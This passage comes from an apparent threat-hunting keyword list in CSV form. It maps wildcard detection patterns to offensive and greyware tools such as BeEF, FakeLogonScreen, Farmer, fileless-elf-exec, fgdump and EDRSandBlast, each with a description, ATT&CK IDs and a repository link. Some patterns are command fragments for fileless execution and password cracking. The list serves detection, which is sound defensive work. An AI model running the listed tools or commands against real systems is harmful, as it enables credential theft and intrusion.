T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_flash_update*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_lastpass/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_notification_ff/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*FakeAMSI.c*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeAMSI.dll*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeAMSI.exe*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeCmdLine.*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeDriver.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*FakeDriver2.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*fakefuse.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" +"*fakefuse.h*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" +"*FakeImageExploiter*","offensive_tool_keyword","FakeImageExploiter","This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them.","T1564 - T1218 - T1204 - T1558.001","TA0002 - TA0008 - TA0010","N/A","N/A","Phishing","https://github.com/r00t-3xp10it/FakeImageExploiter","1","1","N/A","N/A","9","843","356","2019-12-06T20:59:26Z","2017-04-04T20:53:47Z" +"*fakelogonscreen *","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" +"*fakelogonscreen*.zip*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" +"*FakeLogonScreen.csproj*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" +"*fakelogonscreen.exe*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" +"*FakeLogonScreen.sln*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" +"*fakepath31337*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*FakePPID.*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*fake-sms-main*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*faketime '202* zsh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*farmer.exe *\windows\temp*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*farmer.exe 8888 60*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*Farmer\Farmer.csproj*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*Farmer-main.zip*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*fastfuz-chrome-ext*files.txt*","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","1","23","3","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z" +"*FastjsonScan.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*fasttrack/wordlist.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*fatal: buffer_get_string: bad string*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*favfreak-http*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*fb5dc2d637faab73729d65323fcc7d4b7edf43bf9f3de8d8e65ea55670229815*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*fcfhplploccackoneaefokcmbjfbkenj*","greyware_tool_keyword","1clickVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*fcrackzip *","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*fcrackzip *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*fcrackzip -u -v -D -p *.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*fdcgdnkidjaadafnichfpabhfomcebme*","greyware_tool_keyword","ZenMate VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*fde1b109f9704ff7.css*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*FE4414D9-1D7E-4EEB-B781-D278FE7A5619*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","0","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*FE8F0D23-BDD1-416D-8285-F947BA86D155*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*fea01b74-7a60-4142-a54d-7aa8f6471c00*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*fee */* -l pl | perl*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*fee */* -l pl | ruby*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*fee -a *killall sshd* *busybox*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*fee -c */* | ssh *@*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*fee -c */* -w 64 | *","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*feroxbuster -w *fzf-wordlists* -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Fertiliser.exe \\*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*ff_osx_extension-dropper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ff3f6b103b45ea48c5fa447854a35950378ce7558868d4975fd5b11202d0a991*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*FFA0FDDE-BE70-49E4-97DE-753304EF1113*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*FFA0FDDE-BE70-49E4-97DE-753304EF1113*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*ffbkglfijbcbgblgflchnbphjdllaogb*","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*ffhhkmlgedgcliajaedapkdfigdobcif*","greyware_tool_keyword","Nucleus VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*ffuf *-input-cmd*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf *-u http*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf -c *","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf -fs 185 -c -w *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ffuf -w *","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf.exe*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf/ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_freebsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_linux_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_macOS_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_openbsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_windows_*.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf-master.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*fgddmllnllkalaagkghckoinaemmogpe*","greyware_tool_keyword","ExpressVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*fgdump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*fgexec.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ficajfeojakddincjafebjmfiefcmanc*","greyware_tool_keyword","Best VPN USA","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*fierce --domain* --dns-servers *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 